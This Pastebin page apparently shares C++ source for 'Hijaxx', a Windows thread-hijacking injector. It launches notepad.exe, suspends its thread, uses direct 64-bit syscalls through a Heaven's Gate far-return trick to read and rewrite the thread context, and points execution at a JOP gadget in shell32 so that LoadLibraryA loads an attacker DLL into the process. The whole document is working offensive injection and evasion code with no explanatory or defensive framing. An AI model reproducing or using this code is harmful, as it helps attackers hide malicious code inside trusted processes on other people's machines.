Advertisement
FlyFar

Hijaxx - double hijacking - C++

Mar 3rd, 2023
919
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 4.20 KB | Cybersecurity | 0 0
  1. #include "hijaxx.h"
  2.  
  3. inline DWORD GetSystemServiceNumber(LPCSTR func_name)
  4. {
  5.     FARPROC NtFunc = GetProcAddress(GetModuleHandle(L"ntdll"), func_name);
  6.     return (DWORD)*(WORD*)((BYTE*)NtFunc + 1);
  7. }
  8.  
  9. //need to call directly into 64bit ntdll as the wow64 version provides sanitation on args
  10. __declspec(naked) DWORD64 Syscall64(DWORD syscall_number, DWORD argc, ...)
  11. {
  12.     enum reg { rax_ = 0xc, argc_ = 0x10, rcx_ = 0x14, rdx_ = 0x18, r8_ = 0x1c, r9_ = 0x20, stack_args = 0x24 };
  13.     _asm {
  14.             push 0x33
  15.             call x64
  16.         x64 :
  17.             add dword ptr[esp], 5
  18.             retf
  19.             push ebp
  20.             mov ebp, esp
  21.             mov ecx, dword ptr[esp + argc_]
  22.             cmp ecx, 4
  23.             je no_stack_args
  24.             sub ecx, 1
  25.         load_stack_args:
  26.             mov eax, dword ptr[ebp + rcx_ + ecx * 4]
  27.             cmp ecx, 4
  28.             jl no_stack_args
  29.             push eax
  30.             loopnz load_stack_args
  31.         no_stack_args :
  32.             mov eax, dword ptr[ebp + rax_]
  33.             mov ecx, dword ptr[ebp + rcx_]
  34.             mov edx, dword ptr[ebp + rdx_]
  35.             EMIT(0X67) EMIT(0X44) EMIT(0X8b) EMIT(0X45) EMIT(0X1c)              //mov r8d,  dword ptr [esp + r8_]
  36.             EMIT(0x67) EMIT(0X44) EMIT(0X8b) EMIT(0X4d) EMIT(0X20)              //mov r9d,  dword ptr [ebp + r9_]
  37.             EMIT(0X4c) EMIT(0X8b) EMIT(0Xd1)                                    //mov r10,  rcx
  38.             sub esp, 20h
  39.             EMIT(0x0F) EMIT(0x05)                                               //syscall
  40.             dec eax
  41.             mov edx, eax
  42.             dec eax
  43.             shr edx, 20h
  44.             mov esp, ebp
  45.             pop ebp
  46.             call x86
  47.         x86:
  48.             mov dword ptr[esp + 4], 0x23
  49.             add dword ptr[esp], 0xd
  50.             retf
  51.             ret
  52.     };
  53. }
  54.  
  55. LPVOID SearchModuleMemory(HMODULE mod, char* search_string, BOOL is_code)
  56. {
  57.     LPVOID mem_regions = mod;
  58.     MODULEINFO mi = { 0 };
  59.     MEMORY_BASIC_INFORMATION mbi = { 0 };
  60.     GetModuleInformation(GetCurrentProcess(), mod, &mi, sizeof(mi));
  61.     for (; VirtualQuery(mem_regions, &mbi, sizeof(mbi)) == sizeof(mbi); mem_regions = (LPVOID)((SIZE_T)mem_regions + mbi.RegionSize)) {
  62.         if (mbi.State == MEM_COMMIT && mbi.Protect != PAGE_NOACCESS) {
  63.             if ((is_code) && !(mbi.Protect & IMAGE_SECTION_EXECUTABLE))
  64.                 continue;
  65.             for (SIZE_T j = 0; j < mbi.RegionSize - 4; j++) {
  66.                 if ((memcmp(search_string, (LPVOID)((DWORD)mem_regions + j), sizeof(search_string) - ((is_code) ? 1 : 0))) == 0) {
  67.                     return  (LPVOID)((DWORD)mem_regions + j);
  68.                 }
  69.             }
  70.         }
  71.     }
  72.     return NULL;
  73. }
  74.  
  75. VOID Injex(LPWSTR host_file)
  76. {
  77.     CONTEXT ctx = { 0 };
  78.     STARTUPINFOW si = { 0 };
  79.     PROCESS_INFORMATION pi = { 0 };
  80.     ctx.ContextFlags = CONTEXT_FULL;
  81.     DWORD len, dll_name = 0x006A2E58;
  82.     CreateProcessW(host_file, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
  83.     Sleep(500);
  84.     SuspendThread(pi.hThread);
  85.     DWORD64 ret = Syscall64(
  86.         GetSystemServiceNumber("NtQueryInformationThread"),
  87.         5,
  88.         (DWORD)pi.hThread,
  89.         THREAD_WOW_CONTEXT,
  90.         &ctx,
  91.         sizeof(ctx),
  92.         &len);
  93.  
  94.     //find JOP stuff
  95.     FARPROC _LoadLibraryA = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
  96.     LPVOID remote_lib_string = SearchModuleMemory(GetModuleHandle(L"kernel32.dll"), "1.dll", FALSE);
  97.     //"\x51\xFF\x12"
  98.     //push ecx
  99.     //call[edx]
  100.     LPVOID gadget = SearchModuleMemory(LoadLibrary(L"shell32.dll"), "\x51\xFF\x12", TRUE);
  101.     LPVOID LoadLibraryA_ptr = &_LoadLibraryA;
  102.     LoadLibraryA_ptr = SearchModuleMemory(LoadLibrary(L"shell32.dll"), (char*)LoadLibraryA_ptr, FALSE);
  103.     ctx.Ecx = (DWORD)remote_lib_string;
  104.     ctx.Edx = (DWORD)LoadLibraryA_ptr;
  105.     ctx.Eip = (DWORD)gadget;
  106.  
  107.     ret = Syscall64(
  108.         GetSystemServiceNumber("NtSetInformationThread"),
  109.         4,
  110.         (DWORD)pi.hThread,
  111.         THREAD_WOW_CONTEXT,
  112.         &ctx,
  113.         sizeof(ctx));
  114.  
  115.     ResumeThread(pi.hThread);
  116. }
  117.  
  118. int main(int argc, char *argv[])
  119. {
  120.     Injex(L"c:\\windows\\system32\\notepad.exe");
  121.     return 0;
  122. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement